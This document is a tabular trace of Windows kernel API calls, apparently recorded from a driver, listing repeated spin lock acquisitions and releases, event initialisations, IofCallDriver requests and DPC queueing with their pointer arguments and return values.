| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a786fe4, SpinLock_unk_out = 0xffffe0003a786fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a786fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a786fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003c839cf0, Irp_unk_out = 0xffffe0003c839cf0, ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c634b64, SpinLock_unk_out = 0xffffe0003c634b64, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c634b64, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003c634b64 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004b328d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeWaitForMutexObject | ret_val_out = 0x102 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x0 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6464, SpinLock_unk_out = 0xffffe0003a7b6464, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6464, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b6464 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e76b0, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6346dc, SpinLock_unk_out = 0xffffe0003c6346dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6346dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6346dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6346dc, SpinLock_unk_out = 0xffffe0003c6346dc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6346dc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003c6346dc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6346dc, SpinLock_unk_out = 0xffffe0003c6346dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6346dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6346dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6346dc, SpinLock_unk_out = 0xffffe0003c6346dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6346dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6346dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6344fc, SpinLock_unk_out = 0xffffe0003c6344fc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6344fc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6344fc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6344fc, SpinLock_unk_out = 0xffffe0003c6344fc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6344fc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003c6344fc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6344fc, SpinLock_unk_out = 0xffffe0003c6344fc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6344fc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6344fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003c6344fc, SpinLock_unk_out = 0xffffe0003c6344fc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003c6344fc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003c6344fc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a7b66dc |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b66dc, SpinLock_unk_out = 0xffffe0003a7b66dc, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b66dc, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b66dc |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e42c, SpinLock_unk_out = 0xffffe0003a77e42c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e42c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e42c |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ed250 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e42c, SpinLock_unk_out = 0xffffe0003a77e42c, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e42c, NewIrql_unk = 0x0, SpinLock_unk_out = 0xffffe0003a77e42c |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c1b0, SpinLock_unk_out = 0xfffff800fc55c1b0, ret_val_unk_out = 0x2 |
| KeInsertQueueDpc | Dpc_unk = 0xfffff800fc55c290, SystemArgument1_ptr = 0x0, SystemArgument2_ptr = 0x0, Dpc_unk_out = 0xfffff800fc55c290, ret_val_out = 1 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c1b0, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55c1b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e42c, SpinLock_unk_out = 0xffffe0003a77e42c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e42c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e42c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77e42c, SpinLock_unk_out = 0xffffe0003a77e42c, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77e42c, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77e42c |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x2, SpinLock_unk_out = 0xfffff800fc55af20 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6fe4, SpinLock_unk_out = 0xffffe0003a7b6fe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6fe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6fe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
